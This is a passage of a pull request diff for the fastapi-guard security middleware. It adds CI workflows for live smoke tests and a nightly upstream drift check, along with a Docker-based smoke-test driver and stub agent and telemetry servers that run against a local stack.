### PR TITLE
ci: live smoke on PRs and a nightly upstream drift gate against guard-core master

### DIFF
--- a/.github/workflows/live-smoke.yml
+++ b/.github/workflows/live-smoke.yml
@@ -1,0 +1,70 @@
+name: Live Smoke
+
+on:
+  pull_request:
+    branches:
+      - master
+  workflow_dispatch:
+
+jobs:
+  live-smoke:
+    runs-on: ubuntu-latest
+    timeout-minutes: 30
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v7
+
+      - name: Set up Python
+        uses: actions/setup-python@v7
+        with:
+          python-version: '3.10'
+
+      - name: Install uv
+        run: |
+          pip install uv
+
+      - name: Install dependencies
+        run: |
+          uv sync --extra dev
+
+      - name: Build the fastapi-guard wheel from this checkout
+        run: |
+          uv build --wheel --out-dir tests/live_smoke/stack/wheels
+
+      - name: Copy the example app for the live-smoke stack
+        run: |
+          uv run python tests/live_smoke/copy_example_app.py
+
+      - name: Patch the example app for scenario-driven config overrides
+        run: |
+          uv run python tests/live_smoke/patch_example_config.py
+
+      - name: Bring the live-smoke stack up
+        run: |
+          cd tests/live_smoke/stack
+          docker compose -p fastapi-guard-live-smoke up --build --wait
+
+      - name: Run the live-smoke driver
+        shell: bash
+        env:
+          LIVE_SMOKE: '1'
+        run: |
+          mkdir -p tests/live_smoke/live-smoke-report
+          uv run pytest tests/live_smoke -m live_smoke -v \
+            --junitxml=tests/live_smoke/live-smoke-report/junit.xml \
+            2>&1 | tee tests/live_smoke/live-smoke-report/driver.log
+
+      - name: Bring the live-smoke stack down
+        if: always()
+        run: |
+          cd tests/live_smoke/stack
+          docker compose -p fastapi-guard-live-smoke down -v --remove-orphans
+
+      - name: Upload live-smoke report and container logs
+        if: always()
+        uses: actions/upload-artifact@v7
+        with:
+          name: live-smoke-report
+          path: tests/live_smoke/live-smoke-report/
+          if-no-files-found: warn

--- a/.github/workflows/live-smoke.yml
+++ b/.github/workflows/live-smoke.yml
@@ -11,6 +11,9 @@ jobs:
     runs-on: ubuntu-latest
     timeout-minutes: 30
 
+    env:
+      LIVE_SMOKE_PROJECT: fastapi-guard-live-smoke
+
     steps:
       - name: Checkout code
         uses: actions/checkout@v7
@@ -43,12 +46,14 @@ jobs:
       - name: Bring the live-smoke stack up
         run: |
           cd tests/live_smoke/stack
-          docker compose -p fastapi-guard-live-smoke up --build --wait
+          docker compose -p "$LIVE_SMOKE_PROJECT" up --build --wait
 
       - name: Run the live-smoke driver
         shell: bash
         env:
           LIVE_SMOKE: '1'
+          REDIS_URL: redis://localhost:16379
+          REDIS_PREFIX: 'test:fastapi_guard:'
         run: |
           mkdir -p tests/live_smoke/live-smoke-report
           uv run pytest tests/live_smoke -m live_smoke -v \
@@ -59,7 +64,7 @@ jobs:
         if: always()
         run: |
           cd tests/live_smoke/stack
-          docker compose -p fastapi-guard-live-smoke down -v --remove-orphans
+          docker compose -p "$LIVE_SMOKE_PROJECT" down -v --remove-orphans
 
       - name: Upload live-smoke report and container logs
         if: always()

--- a/.github/workflows/upstream-drift.yml
+++ b/.github/workflows/upstream-drift.yml
@@ -1,0 +1,92 @@
+name: Upstream Drift
+
+on:
+  schedule:
+    - cron: '0 3 * * *'
+  workflow_dispatch:
+
+jobs:
+  upstream-drift:
+    runs-on: ubuntu-latest
+    timeout-minutes: 30
+
+    services:
+      redis:
+        image: redis
+        ports:
+          - 6379:6379
+        options: >-
+          --health-cmd "redis-cli ping"
+          --health-interval 10s
+          --health-timeout 5s
+          --health-retries 5
+
+    strategy:
+      fail-fast: false
+      matrix:
+        python-version: ['3.10', '3.11', '3.12', '3.13', '3.14']
+
+    steps:
+      - name: Checkout fastapi-guard
+        uses: actions/checkout@v7
+
+      - name: Checkout guard-core@master
+        uses: actions/checkout@v7
+        with:
+          repository: rennf93/guard-core
+          ref: master
+          path: guard-core-upstream
+
+      - name: Set up Python
+        uses: actions/setup-python@v7
+        with:
+          python-version: ${{ matrix.python-version }}
+
+      - name: Install uv
+        run: |
+          pip install uv
+
+      - name: Build the guard-core wheel from guard-core@master
+        run: |
+          cd guard-core-upstream
+          uv build --wheel --out-dir dist
+
+      - name: Install the fastapi-guard dev environment
+        run: |
+          uv sync --extra dev
+
+      - name: Force-install the guard-core@master wheel over the resolved one
+        run: |
+          wheel=$(ls guard-core-upstream/dist/*.whl)
+          uv pip install --python .venv/bin/python --no-deps --force-reinstall "$wheel"
+          .venv/bin/python -c "import guard_core; print(guard_core.__version__); print(guard_core.__file__)"
+
+      - name: Run the fastapi-guard test suite against guard-core@master
+        run: |
+          IPINFO_TOKEN='${{ secrets.IPINFO_TOKEN }}' REDIS_URL='redis://localhost:6379' REDIS_PREFIX='test:fastapi_guard:' uv run --no-sync pytest -v --cov=guard --cov-branch
+
+      - name: Notify Upstream Drift Failure on Slack
+        if: failure()
+        uses: rennf93/good-comms@master
+        with:
+          SLACK_WEBHOOK: '${{ secrets.SLACK_WEBHOOK }}'
+          SLACK_TOKEN: ${{ secrets.SLACK_TOKEN }}
+          STATUS: 'Failed'
+          CHANNEL_ID: '${{ secrets.SLACK_CHANNEL }}'
+          AUTHOR_NAME: 'FastAPI Guard - Upstream Drift - Py${{ matrix.python-version }}'
+          AUTHOR_LINK: 'https://github.com/rennf93/fastapi-guard'
+          AUTHOR_ICON: ':skull:'
+          TITLE: 'Upstream Drift Gate Failed - Py${{ matrix.python-version }}'
+          TITLE_LINK: 'https://github.com/rennf93/fastapi-guard/actions'
+          MESSAGE: |
+            .
+            fastapi-guard@master no longer passes its test suite against
+            guard-core@master.
+
+            Matrix:
+              Python: ${{ matrix.python-version }}
+
+            Run:
+              ${{ github.server_url }}/${{ github.repository }}/actions/runs/${{ github.run_id }}
+            .
+          COLOR: danger

--- a/Makefile
+++ b/Makefile
@@ -234,6 +234,18 @@ high-load-stress-test:
 	@docker compose down --rmi all --remove-orphans -v
 	@docker system prune -f
 
+# Live smoke test
+.PHONY: live-smoke
+live-smoke:
+	@mkdir -p tests/live_smoke/stack/wheels && find tests/live_smoke/stack/wheels -name 'fastapi_guard-*.whl' -delete
+	@uv build --wheel --out-dir tests/live_smoke/stack/wheels
+	@uv run python tests/live_smoke/copy_example_app.py
+	@uv run python tests/live_smoke/patch_example_config.py
+	@LIVE_SMOKE=1 uv run pytest tests/live_smoke -m live_smoke -v; \
+	STATUS=$$?; \
+	(cd tests/live_smoke/stack && docker compose -p fastapi-guard-live-smoke down -v --remove-orphans) >/dev/null 2>&1; \
+	exit $$STATUS
+
 # Serve docs
 .PHONY: serve-docs
 serve-docs:

--- a/compose.yml
+++ b/compose.yml
@@ -34,6 +34,7 @@ services:
       volumes:
         - ./guard:/app/guard:z
         - ./tests:/app/tests:z
+        - ./docs:/app/docs:z
         - ./pyproject.toml:/app/pyproject.toml:z
         - ./uv.lock:/app/uv.lock:z
         - ./vulture_whitelist.py:/app/vulture_whitelist.py:z

--- a/docs/tutorial/security/penetration-detection.md
+++ b/docs/tutorial/security/penetration-detection.md
@@ -75,13 +75,13 @@ The same exists for headers and JSON body keys (`excluded_detection_headers`, `e
 from guard import SecurityDecorator
 
 guard_deco = SecurityDecorator(config)
-app.state.guard_decorator = guard_deco  # the middleware reads route decorators from here
+# the middleware reads route decorators from here
+app.state.guard_decorator = guard_deco
 
 
 @guard_deco.detection_exclusion(params={"redirect_uri", "post_logout_redirect_uri"})
 @app.get("/oauth/authorize")
-async def authorize():
-    ...
+async def authorize(): ...
 ```
 
 Everything else on the request is still scanned.

--- a/examples/advanced_app/app/main.py
+++ b/examples/advanced_app/app/main.py
@@ -3,7 +3,7 @@ from collections.abc import AsyncGenerator
 from contextlib import asynccontextmanager
 from typing import Any
 
-from fastapi import FastAPI, HTTPException, Request
+from fastapi import Depends, FastAPI, HTTPException, Request, WebSocket
 from fastapi.responses import JSONResponse
 
 from app.models import ErrorResponse, RootResponse
@@ -21,7 +21,7 @@ from app.routes import (
     test_router,
 )
 from app.security import guard, security_config
-from guard import SecurityMiddleware
+from guard import SecurityMiddleware, guard_websocket
 from guard.lifespan import make_lifespan
 
 logging.basicConfig(
@@ -128,3 +128,13 @@ async def general_exception_handler(request: Request, exc: Exception) -> JSONRes
             error_code="INTERNAL_ERROR",
         ).model_dump(mode="json"),
     )
+
+
+@app.websocket("/ws")
+async def websocket_echo(
+    websocket: WebSocket, _: None = Depends(guard_websocket)
+) -> None:
+    await websocket.accept()
+    message = await websocket.receive_text()
+    await websocket.send_text(message)
+    await websocket.close()

--- a/pyproject.toml
+++ b/pyproject.toml
@@ -117,7 +117,7 @@ allow-direct-references = true
 
 [tool.ruff]
 target-version = "py310"
-exclude = ["vulture_whitelist.py", ".venv"]
+exclude = ["vulture_whitelist.py", ".venv", "tests/live_smoke/stack/app"]
 
 [tool.ruff.lint]
 select = [
@@ -166,7 +166,7 @@ warn_redundant_casts = true
 warn_unused_ignores = true
 warn_no_return = true
 warn_unreachable = true
-exclude = ["vulture_whitelist.py", ".venv", "manual_testing", "ZZZ"]
+exclude = ["vulture_whitelist.py", ".venv", "manual_testing", "ZZZ", "tests/live_smoke/stack/app"]
 
 
 [tool.pymarkdown.system]
@@ -213,7 +213,7 @@ enabled = false
 
 [tool.vulture]
 paths = ["guard", "tests", "vulture_whitelist.py"]
-exclude = ["**/conftest.py", ".venv"]
+exclude = ["**/conftest.py", ".venv", "tests/live_smoke/stack/app"]
 min_confidence = 100
 ignore_decorators = [
     "@app.route",

--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -53,8 +53,8 @@ async def _clear_middleware_state_registry() -> AsyncGenerator[None, None]:
     clear_state_registry()
 
 
-REDIS_URL = str(os.getenv("REDIS_URL"))
-REDIS_PREFIX = str(os.getenv("REDIS_PREFIX"))
+REDIS_URL = os.getenv("REDIS_URL") or "redis://localhost:6379"
+REDIS_PREFIX = os.getenv("REDIS_PREFIX") or "test:fastapi_guard:"
 
 
 @pytest.fixture(autouse=True)

--- a/tests/live_smoke/.gitignore
+++ b/tests/live_smoke/.gitignore
@@ -1,0 +1,5 @@
+stack/app/
+stack/wheels/*.whl
+stack/scenario_data/*
+!stack/scenario_data/.keep
+live-smoke-report/

--- a/tests/live_smoke/agent_stub.py
+++ b/tests/live_smoke/agent_stub.py
@@ -1,0 +1,261 @@
+import gzip
+import json
+import os
+import threading
+import time
+from datetime import datetime, timedelta, timezone
+from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
+from typing import Any
+
+API_KEY = os.environ.get("SMOKE_AGENT_API_KEY", "smoke-agent-key")
+PORT = int(os.environ.get("SMOKE_AGENT_PORT", "8090"))
+
+_lock = threading.Lock()
+_state: dict[str, list[Any]] = {
+    "events": [],
+    "metrics": [],
+    "status": [],
+    "requests": [],
+}
+_rule_version = 1
+_rule_suspicious_patterns: list[str] | None = None
+_delay_seconds = 0.0
+_forced_status: int | None = None
+_in_flight = 0
+_high_water_mark = 0
+
+_CONTROL_PATHS = {
+    "/health",
+    "/_debug/state",
+    "/_debug/reset",
+    "/_debug/delay",
+    "/_debug/status",
+    "/_debug/rules",
+}
+_FORCIBLE_PATHS = {"/api/v1/events", "/api/v1/metrics", "/api/v1/status"}
+_ENVELOPE_FIELDS = (
+    "project_id",
+    "batch_id",
+    "created_at",
+    "agent_version",
+    "guard_version",
+    "guard_core_version",
+)
+
+
+def _read_body(handler: BaseHTTPRequestHandler) -> dict[str, Any]:
+    length = int(handler.headers.get("Content-Length", "0"))
+    raw = handler.rfile.read(length) if length else b""
+    if handler.headers.get("Content-Encoding") == "gzip":
+        raw = gzip.decompress(raw)
+    if not raw:
+        return {}
+    return dict(json.loads(raw.decode("utf-8")))
+
+
+def _send_json(
+    handler: BaseHTTPRequestHandler, status: int, payload: dict[str, Any]
+) -> None:
+    body = json.dumps(payload).encode("utf-8")
+    handler.send_response(status)
+    handler.send_header("Content-Type", "application/json")
+    handler.send_header("Content-Length", str(len(body)))
+    handler.end_headers()
+    handler.wfile.write(body)
+
+
+def _record_request(handler: BaseHTTPRequestHandler, body: dict[str, Any]) -> None:
+    with _lock:
+        _state["requests"].append(
+            {
+                "path": handler.path,
+                "headers": dict(handler.headers.items()),
+                "envelope": {field: body.get(field) for field in _ENVELOPE_FIELDS},
+            }
+        )
+
+
+class _InFlightTracker:
+    def __enter__(self) -> "_InFlightTracker":
+        global _in_flight, _high_water_mark
+        with _lock:
+            _in_flight += 1
+            _high_water_mark = max(_high_water_mark, _in_flight)
+        return self
+
+    def __exit__(self, *exc_info: object) -> None:
+        global _in_flight
+        with _lock:
+            _in_flight -= 1
+
+
+class Handler(BaseHTTPRequestHandler):
+    def log_message(self, *args: object) -> None:
+        return
+
+    def _authorized(self) -> bool:
+        return self.headers.get("X-API-Key") == API_KEY
+
+    def _maybe_delay(self) -> None:
+        if self.path in _CONTROL_PATHS:
+            return
+        with _lock:
+            delay = _delay_seconds
+        if delay:
+            time.sleep(delay)
+
+    def _forced_status_for(self, path: str) -> int | None:
+        if path not in _FORCIBLE_PATHS:
+            return None
+        with _lock:
+            return _forced_status
+
+    def do_GET(self) -> None:
+        with _InFlightTracker():
+            self._maybe_delay()
+            self._handle_get()
+
+    def _handle_get(self) -> None:
+        if self.path == "/health":
+            _send_json(self, 200, {"status": "ok"})
+            return
+        if self.path == "/_debug/state":
+            self._handle_debug_state()
+            return
+        if self.path == "/api/v1/rules":
+            self._handle_rules()
+            return
+        _send_json(self, 404, {"detail": "not found"})
+
+    def _handle_debug_state(self) -> None:
+        with _lock:
+            snapshot = {
+                "events": list(_state["events"]),
+                "metrics": list(_state["metrics"]),
+                "status": list(_state["status"]),
+                "requests": list(_state["requests"]),
+                "high_water_mark": _high_water_mark,
+                "in_flight": _in_flight,
+                "delay_seconds": _delay_seconds,
+                "forced_status": _forced_status,
+            }
+        _send_json(self, 200, snapshot)
+
+    def _handle_rules(self) -> None:
+        if not self._authorized():
+            _send_json(self, 401, {"detail": "unauthorized"})
+            return
+        forced = self._forced_status_for(self.path)
+        if forced is not None:
+            _send_json(self, forced, {"detail": "forced status"})
+            return
+        global _rule_version
+        with _lock:
+            version = _rule_version
+            _rule_version += 1
+            patterns = _rule_suspicious_patterns
+        now = datetime.now(timezone.utc)
+        payload: dict[str, Any] = {
+            "rule_id": "smoke-rule",
+            "version": version,
+            "timestamp": now.isoformat(),
+            "expires_at": (now + timedelta(hours=1)).isoformat(),
+            "ttl": 300,
+            "auto_ban_threshold": 9,
+            "emergency_whitelist_only": True,
+            "message": "smoke-live-agent-rule",
+        }
+        if patterns is not None:
+            payload["suspicious_patterns"] = patterns
+        _send_json(self, 200, payload)
+
+    def do_POST(self) -> None:
+        with _InFlightTracker():
+            self._maybe_delay()
+            self._handle_post()
+
+    def _handle_post(self) -> None:
+        debug_handlers = {
+            "/_debug/reset": self._handle_debug_reset,
+            "/_debug/delay": self._handle_debug_delay,
+            "/_debug/status": self._handle_debug_status,
+            "/_debug/rules": self._handle_debug_rules,
+        }
+        handler = debug_handlers.get(self.path)
+        if handler is not None:
+            handler()
+            return
+        self._handle_data_post()
+
+    def _handle_data_post(self) -> None:
+        if not self._authorized():
+            _read_body(self)
+            _send_json(self, 401, {"detail": "unauthorized"})
+            return
+        body = _read_body(self)
+        _record_request(self, body)
+        forced = self._forced_status_for(self.path)
+        if forced is not None:
+            _send_json(self, forced, {"detail": "forced status"})
+            return
+        if self.path == "/api/v1/events":
+            with _lock:
+                _state["events"].extend(body.get("events", []))
+            _send_json(self, 200, {"success": True})
+            return
+        if self.path == "/api/v1/metrics":
+            with _lock:
+                _state["metrics"].extend(body.get("metrics", []))
+            _send_json(self, 200, {"success": True})
+            return
+        if self.path == "/api/v1/status":
+            with _lock:
+                _state["status"].append(body)
+            _send_json(self, 200, {"success": True})
+            return
+        _send_json(self, 404, {"detail": "not found"})
+
+    def _handle_debug_reset(self) -> None:
+        global _delay_seconds, _forced_status, _rule_suspicious_patterns
+        global _high_water_mark
+        with _lock:
+            _state["events"].clear()
+            _state["metrics"].clear()
+            _state["status"].clear()
+            _state["requests"].clear()
+            _delay_seconds = 0.0
+            _forced_status = None
+            _rule_suspicious_patterns = None
+            _high_water_mark = 0
+        _send_json(self, 200, {"success": True})
+
+    def _handle_debug_delay(self) -> None:
+        global _delay_seconds
+        payload = _read_body(self)
+        with _lock:
+            _delay_seconds = float(payload.get("seconds", 0.0))
+        _send_json(self, 200, {"seconds": _delay_seconds})
+
+    def _handle_debug_status(self) -> None:
+        global _forced_status
+        payload = _read_body(self)
+        code = payload.get("code")
+        with _lock:
+            _forced_status = int(code) if code is not None else None
+        _send_json(self, 200, {"code": _forced_status})
+
+    def _handle_debug_rules(self) -> None:
+        global _rule_suspicious_patterns
+        payload = _read_body(self)
+        with _lock:
+            _rule_suspicious_patterns = payload.get("suspicious_patterns")
+        _send_json(self, 200, {"suspicious_patterns": _rule_suspicious_patterns})
+
+
+def main() -> None:
+    server = ThreadingHTTPServer(("0.0.0.0", PORT), Handler)
+    server.serve_forever()
+
+
+if __name__ == "__main__":
+    main()

--- a/tests/live_smoke/conftest.py
+++ b/tests/live_smoke/conftest.py
@@ -1,0 +1,104 @@
+from __future__ import annotations
+
+import importlib
+import os
+from collections.abc import Iterator
+from pathlib import Path
+
+import pytest
+
+from tests.live_smoke.driver import (
+    STACK_DIR,
+    ScenarioContext,
+    Stack,
+    make_agent_client,
+    make_http_client,
+    make_otlp_client,
+    make_redis_client,
+)
+
+_HERE = Path(__file__).resolve().parent
+
+
+def pytest_configure(config: pytest.Config) -> None:
+    config.addinivalue_line(
+        "markers",
+        "live_smoke: end-to-end scenarios against the live Docker stack "
+        "(requires LIVE_SMOKE=1 and Docker)",
+    )
+    importlib.import_module("tests.live_smoke.scenarios")
+
+
+def pytest_ignore_collect(collection_path: Path, config: pytest.Config) -> bool | None:
+    if os.environ.get("LIVE_SMOKE") == "1":
+        return None
+    try:
+        collection_path.relative_to(_HERE)
+    except ValueError:
+        return None
+    return True
+
+
+def pytest_collection_modifyitems(
+    config: pytest.Config, items: list[pytest.Item]
+) -> None:
+    ours: list[pytest.Item] = []
+    others: list[pytest.Item] = []
+    for item in items:
+        try:
+            item.path.relative_to(_HERE)
+        except ValueError:
+            others.append(item)
+            continue
+        item.add_marker(pytest.mark.live_smoke)
+        ours.append(item)
+
+    ours.sort(key=lambda item: item.path.name == "test_completeness.py")
+    items[:] = others + ours
+
+
+def _check_preconditions() -> None:
+    wheels = list((STACK_DIR / "wheels").glob("*.whl"))
+    if not wheels:
+        pytest.fail(
+            "no fastapi-guard wheel in tests/live_smoke/stack/wheels/; run "
+            "`uv build --wheel --out-dir tests/live_smoke/stack/wheels` first. "
+            "See `make live-smoke`.",
+            pytrace=False,
+        )
+    if not (STACK_DIR / "app" / "security.py").is_file():
+        pytest.fail(
+            "tests/live_smoke/stack/app/ is missing; run "
+            "`python tests/live_smoke/copy_example_app.py` then "
+            "`python tests/live_smoke/patch_example_config.py` first. "
+            "See `make live-smoke`.",
+            pytrace=False,
+        )
+
+
+@pytest.fixture(scope="session")
+def stack() -> Iterator[Stack]:
+    _check_preconditions()
+    instance = Stack()
+    instance.up()
+    try:
+        yield instance
+    finally:
+        instance.down()
+
+
+@pytest.fixture(scope="session")
+def scenario_context(stack: Stack) -> Iterator[ScenarioContext]:
+    client = make_http_client()
+    agent = make_agent_client()
+    redis_client = make_redis_client()
+    otlp = make_otlp_client()
+    try:
+        yield ScenarioContext(
+            stack=stack, client=client, agent=agent, redis=redis_client, otlp=otlp
+        )
+    finally:
+        client.close()
+        agent.close()
+        redis_client.close()
+        otlp.close()

--- a/tests/live_smoke/copy_example_app.py
+++ b/tests/live_smoke/copy_example_app.py
@@ -1,0 +1,26 @@
+import shutil
+import sys
+from pathlib import Path
+
+REPO_ROOT = Path(__file__).resolve().parents[2]
+SOURCE = REPO_ROOT / "examples" / "advanced_app" / "app"
+STACK_DIR = Path(__file__).resolve().parent / "stack"
+DEST = STACK_DIR / "app"
+
+
+def copy_example_app() -> None:
+    if not SOURCE.is_dir():
+        raise RuntimeError(f"examples/advanced_app/app not found under {REPO_ROOT}")
+    if DEST.exists():
+        shutil.rmtree(DEST)
+    shutil.copytree(SOURCE, DEST)
+
+
+def main() -> int:
+    copy_example_app()
+    print(f"copied examples/advanced_app/app -> {DEST}")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())

--- a/tests/live_smoke/driver.py
+++ b/tests/live_smoke/driver.py
@@ -210,7 +210,9 @@ class Stack:
     def _flush_smoke_state(self) -> None:
         client = make_redis_client()
         try:
-            client.flushdb()
+            keys = list(client.scan_iter(match="smoke:*"))
+            if keys:
+                client.delete(*keys)
         finally:
             client.close()
 

--- a/tests/live_smoke/driver.py
+++ b/tests/live_smoke/driver.py
@@ -1,0 +1,263 @@
+from __future__ import annotations
+
+import json
+import os
+import socket
+import subprocess
+import time
+import uuid
+from dataclasses import dataclass
+from datetime import datetime, timezone
+from pathlib import Path
+from typing import Any
+
+import httpx
+import redis
+
+STACK_DIR = Path(__file__).resolve().parent / "stack"
+REPORT_DIR = Path(__file__).resolve().parent / "live-smoke-report"
+PROJECT = os.environ.get("LIVE_SMOKE_PROJECT", "fastapi-guard-live-smoke")
+CONFIG_FILE = STACK_DIR / "scenario_data" / f"config-{PROJECT}.json"
+APP_SERVICE = "fastapi-guard-example"
+
+NGINX_PORT = int(os.environ.get("LIVE_SMOKE_NGINX_PORT", "8089"))
+AGENT_PORT = int(os.environ.get("LIVE_SMOKE_AGENT_PORT", "8091"))
+REDIS_PORT = int(os.environ.get("LIVE_SMOKE_REDIS_PORT", "16379"))
+OTLP_STUB_PORT = int(os.environ.get("LIVE_SMOKE_OTLP_STUB_PORT", "8092"))
+
+BASE_URL = f"http://localhost:{NGINX_PORT}"
+AGENT_URL = f"http://localhost:{AGENT_PORT}"
+OTLP_STUB_URL = f"http://localhost:{OTLP_STUB_PORT}"
+
+
+def _compose(
+    *args: str,
+    check: bool = True,
+    env: dict[str, str] | None = None,
+    timeout: float | None = None,
+) -> subprocess.CompletedProcess[str]:
+    cmd = [
+        "docker",
+        "compose",
+        "-p",
+        PROJECT,
+        "-f",
+        str(STACK_DIR / "compose.yml"),
+        *args,
+    ]
+    full_env = {**os.environ, "LIVE_SMOKE_PROJECT": PROJECT, **(env or {})}
+    return subprocess.run(
+        cmd,
+        cwd=STACK_DIR,
+        capture_output=True,
+        text=True,
+        check=check,
+        env=full_env,
+        timeout=timeout,
+    )
+
+
+class LogReader:
+    def __init__(self, service: str = APP_SERVICE) -> None:
+        self._service = service
+
+    def mark(self) -> str:
+        return datetime.now(timezone.utc).isoformat()
+
+    def lines_since(self, mark: str, kind: str | None = None) -> list[str]:
+        result = _compose(
+            "logs", "--no-color", "--since", mark, self._service, check=False
+        )
+        lines = result.stdout.splitlines()
+        if kind is None:
+            return lines
+        return [line for line in lines if kind in line]
+
+    def full_text(self) -> str:
+        result = _compose("logs", "--no-color", self._service, check=False)
+        return result.stdout
+
+
+def run_in_app_container(
+    python_code: str, timeout: float = 30.0
+) -> subprocess.CompletedProcess[str]:
+    try:
+        return _compose(
+            "exec",
+            "-T",
+            APP_SERVICE,
+            "python",
+            "-c",
+            python_code,
+            check=False,
+            timeout=timeout,
+        )
+    except subprocess.TimeoutExpired as exc:
+        stdout = exc.stdout.decode() if isinstance(exc.stdout, bytes) else exc.stdout
+        return subprocess.CompletedProcess(
+            args=exc.cmd,
+            returncode=124,
+            stdout=stdout or "",
+            stderr=f"run_in_app_container timed out after {timeout}s",
+        )
+
+
+def _parse_http_response(raw: bytes) -> tuple[int, dict[str, str], bytes]:
+    head, _, body = raw.partition(b"\r\n\r\n")
+    lines = head.split(b"\r\n")
+    status_line = lines[0].decode("latin-1") if lines else ""
+    parts = status_line.split(" ", 2)
+    status_code = int(parts[1]) if len(parts) >= 2 and parts[1].isdigit() else 0
+    headers: dict[str, str] = {}
+    for line in lines[1:]:
+        name, sep, value = line.decode("latin-1").partition(":")
+        if sep:
+            headers[name.strip().lower()] = value.strip()
+    return status_code, headers, body
+
+
+def send_slow_body(
+    path: str,
+    headers: dict[str, str],
+    body: bytes,
+    stall_seconds: float,
+    *,
+    method: str = "POST",
+    socket_timeout: float = 30.0,
+) -> tuple[int, dict[str, str], bytes]:
+    request_headers = {
+        "Host": "localhost",
+        "Content-Length": str(len(body)),
+        "Connection": "close",
+        **headers,
+    }
+    header_lines = "\r\n".join(
+        f"{name}: {value}" for name, value in request_headers.items()
+    )
+    request_line = f"{method} {path} HTTP/1.1\r\n{header_lines}\r\n\r\n"
+
+    sock = socket.create_connection(("localhost", NGINX_PORT), timeout=socket_timeout)
+    try:
+        sock.sendall(request_line.encode("latin-1"))
+        time.sleep(stall_seconds)
+        sock.sendall(body)
+        sock.settimeout(socket_timeout)
+        chunks: list[bytes] = []
+        try:
+            while True:
+                chunk = sock.recv(65536)
+                if not chunk:
+                    break
+                chunks.append(chunk)
+        except TimeoutError:
+            pass
+    finally:
+        sock.close()
+
+    return _parse_http_response(b"".join(chunks))
+
+
+class Stack:
+    def __init__(self) -> None:
+        self.logs = LogReader()
+        self._current_config_key: str | None = None
+
+    def up(self) -> None:
+        _compose("up", "--build", "--wait")
+
+    def dump_logs(self) -> None:
+        REPORT_DIR.mkdir(parents=True, exist_ok=True)
+        (REPORT_DIR / "app.log").write_text(
+            _compose("logs", "--no-color", APP_SERVICE, check=False).stdout,
+            encoding="utf-8",
+        )
+        (REPORT_DIR / "all-services.log").write_text(
+            _compose("logs", "--no-color", check=False).stdout, encoding="utf-8"
+        )
+        (REPORT_DIR / "ps.txt").write_text(
+            _compose("ps", check=False).stdout, encoding="utf-8"
+        )
+
+    def down(self) -> None:
+        self.dump_logs()
+        _compose("down", "-v", "--remove-orphans", check=False)
+
+    def container_file(self, path: str) -> str:
+        result = _compose("exec", "-T", APP_SERVICE, "cat", path, check=False)
+        if result.returncode != 0:
+            raise FileNotFoundError(f"{path} in {APP_SERVICE}: {result.stderr.strip()}")
+        return result.stdout
+
+    def _wait_healthy(self, expected_nonce: str, timeout: float = 60.0) -> None:
+        deadline = time.monotonic() + timeout
+        last_stderr = ""
+        check_cmd = (
+            "import pathlib, urllib.request; "
+            "urllib.request.urlopen('http://localhost:8000/health'); "
+            "nonce = pathlib.Path('/tmp/smoke_nonce.txt').read_text(); "
+            f"assert nonce == {expected_nonce!r}, nonce"
+        )
+        while time.monotonic() < deadline:
+            result = _compose(
+                "exec", "-T", APP_SERVICE, "python", "-c", check_cmd, check=False
+            )
+            if result.returncode == 0:
+                return
+            last_stderr = result.stderr.strip()
+            time.sleep(0.5)
+        raise RuntimeError(f"{APP_SERVICE} did not become healthy: {last_stderr}")
+
+    def _flush_smoke_state(self) -> None:
+        client = make_redis_client()
+        try:
+            client.flushdb()
+        finally:
+            client.close()
+
+    def restart_with(self, config: dict[str, Any], force: bool = False) -> None:
+        key = json.dumps(config, sort_keys=True, default=str)
+        if not force and key == self._current_config_key:
+            return
+        self._flush_smoke_state()
+        nonce = uuid.uuid4().hex
+        payload = {**config, "smoke_nonce": nonce}
+        CONFIG_FILE.write_text(json.dumps(payload), encoding="utf-8")
+        _compose("restart", APP_SERVICE)
+        self._wait_healthy(nonce)
+        self._current_config_key = key
+
+
+@dataclass
+class ScenarioContext:
+    stack: Stack
+    client: httpx.Client
+    agent: httpx.Client
+    redis: redis.Redis
+    otlp: httpx.Client
+
+
+def make_redis_client(db: int = 0) -> redis.Redis:
+    return redis.Redis(host="localhost", port=REDIS_PORT, db=db, decode_responses=True)
+
+
+def make_http_client() -> httpx.Client:
+    return httpx.Client(base_url=BASE_URL, timeout=10.0)
+
+
+def make_agent_client() -> httpx.Client:
+    return httpx.Client(base_url=AGENT_URL, timeout=10.0)
+
+
+def make_otlp_client() -> httpx.Client:
+    return httpx.Client(base_url=OTLP_STUB_URL, timeout=10.0)
+
+
+def wait_until(predicate: Any, timeout: float = 15.0, interval: float = 0.5) -> Any:
+    deadline = time.monotonic() + timeout
+    last: Any = None
+    while time.monotonic() < deadline:
+        last = predicate()
+        if last:
+            return last
+        time.sleep(interval)
+    return last

--- a/tests/live_smoke/otlp_stub.py
+++ b/tests/live_smoke/otlp_stub.py
@@ -1,0 +1,71 @@
+import base64
+import json
+import os
+import threading
+from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
+
+PORT = int(os.environ.get("SMOKE_OTLP_STUB_PORT", "4318"))
+
+_lock = threading.Lock()
+_requests: list[dict[str, object]] = []
+
+
+def _send_json(
+    handler: BaseHTTPRequestHandler, status: int, payload: dict[str, object]
+) -> None:
+    body = json.dumps(payload).encode("utf-8")
+    handler.send_response(status)
+    handler.send_header("Content-Type", "application/json")
+    handler.send_header("Content-Length", str(len(body)))
+    handler.end_headers()
+    handler.wfile.write(body)
+
+
+class Handler(BaseHTTPRequestHandler):
+    def log_message(self, *args: object) -> None:
+        return
+
+    def _read_body(self) -> bytes:
+        length = int(self.headers.get("Content-Length", "0"))
+        return self.rfile.read(length) if length else b""
+
+    def _record_and_accept(self, method: str) -> None:
+        raw = self._read_body()
+        with _lock:
+            _requests.append(
+                {
+                    "method": method,
+                    "path": self.path,
+                    "headers": dict(self.headers.items()),
+                    "body_base64": base64.b64encode(raw).decode("ascii"),
+                    "body_text": raw.decode("utf-8", errors="replace"),
+                }
+            )
+        _send_json(self, 200, {"partialSuccess": {}})
+
+    def do_GET(self) -> None:
+        if self.path == "/_debug/state":
+            with _lock:
+                _send_json(self, 200, {"requests": list(_requests)})
+            return
+        self._record_and_accept("GET")
+
+    def do_POST(self) -> None:
+        if self.path == "/_debug/reset":
+            with _lock:
+                _requests.clear()
+            _send_json(self, 200, {"success": True})
+            return
+        self._record_and_accept("POST")
+
+    def do_PUT(self) -> None:
+        self._record_and_accept("PUT")
+
+
+def main() -> None:
